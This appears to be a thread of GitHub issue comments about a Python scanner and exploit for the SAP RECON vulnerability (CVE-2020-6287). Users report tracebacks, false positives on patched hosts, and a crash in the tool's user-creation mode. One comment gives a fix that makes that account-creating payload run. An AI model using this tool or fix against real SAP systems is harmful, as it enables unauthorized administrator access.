Only first check is performed (with -c option), because of
return {"status":False, "url":""}
in else clause, that exits the loop
Is it intended to work like that?

first thanks for the script.

I am running this on python 3.9 on Catalina and I get the following error
ps the PII has been redacted.

SAP_RECON-master python3 RECON.py -H [redactedIP] -c -p [redactedIP]:[Port]
Traceback (most recent call last):
File "/usr/local/lib/python3.9/site-packages/requests/adapters.py", line 412, in send
conn = self.get_connection(request.url, proxies)
File "/usr/local/lib/python3.9/site-packages/requests/adapters.py", line 309, in get_connection
proxy_manager = self.proxy_manager_for(proxy)
File "/usr/local/lib/python3.9/site-packages/requests/adapters.py", line 193, in proxy_manager_for
manager = self.proxy_manager[proxy] = proxy_from_url(
File "/usr/local/lib/python3.9/site-packages/urllib3/poolmanager.py", line 536, in proxy_from_url
return ProxyManager(proxy_url=url, **kw)
File "/usr/local/lib/python3.9/site-packages/urllib3/poolmanager.py", line 480, in init
raise ProxySchemeUnknown(proxy.scheme)
urllib3.exceptions.ProxySchemeUnknown: Not supported proxy scheme None

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/Users/userID/Downloads/SAP_RECON-master/RECON.py", line 218, in
detect_vuln(base_url)
File "/Users/userID/Downloads/SAP_RECON-master/RECON.py", line 30, in detect_vuln
ans = requests.head(base_url + checks['path'], headers=headers, proxies=proxies, timeout=timeout, allow_redirects=False, verify=False)
File "/usr/local/lib/python3.9/site-packages/requests/api.py", line 104, in head
return request('head', url, **kwargs)
File "/usr/local/lib/python3.9/site-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.9/site-packages/requests/sessions.py", line 542, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.9/site-packages/requests/sessions.py", line 655, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.9/site-packages/requests/adapters.py", line 414, in send
raise InvalidURL(e, request=request)
requests.exceptions.InvalidURL: Not supported proxy scheme None

1. The script told me on a fresh patched system (LM CTC 7.50 SPS 16 PL 02) that's vulnerable.

$ python3 test.py -H t4stsystemhost -c -v
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://t4stsystemhost:50000/CTCWebService/CTCWebServiceBean

-> works not as designed

2. The script told me on a old system (LM CTC 7.50 SPS 16 PL 00) that's vulnerable.

$ python3 test.py -H t4stsystemhost -c -v
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://t4stsystemhost:50000/CTCWebService/CTCWebServiceBean

-> works as designed

3. The script say that everthing is fine if tclmctcculstartup_app was stopped

$ python3 test.py -H t4stsystemhost  -c -v
Check1 - OK
Check2 - OK
Check3 - OK

-> works as designed

python3 test.py -H testing -u

Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://testing:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5990:Secure!PwD7467
Traceback (most recent call last):
  File "test.py", line 167, in <module>
    exploit_createUser(result["url"].replace("?wsdl", ""))
  File "test.py", line 113, in exploit_createUser
    payload = generate_CreateUser_paylod()
  File "test.py", line 106, in generate_CreateUser_paylod
    return base64.b64encode(p).encode(encoding='UTF-8')
  File "/usr/lib/python3.6/base64.py", line 58, in b64encode
    encoded = binascii.b2a_base64(s, newline=False)
TypeError: a bytes-like object is required, not 'str'

I changed line 106 with return base64.b64encode(p.encode('utf-8')).decode('utf-8') seems to solve this issue.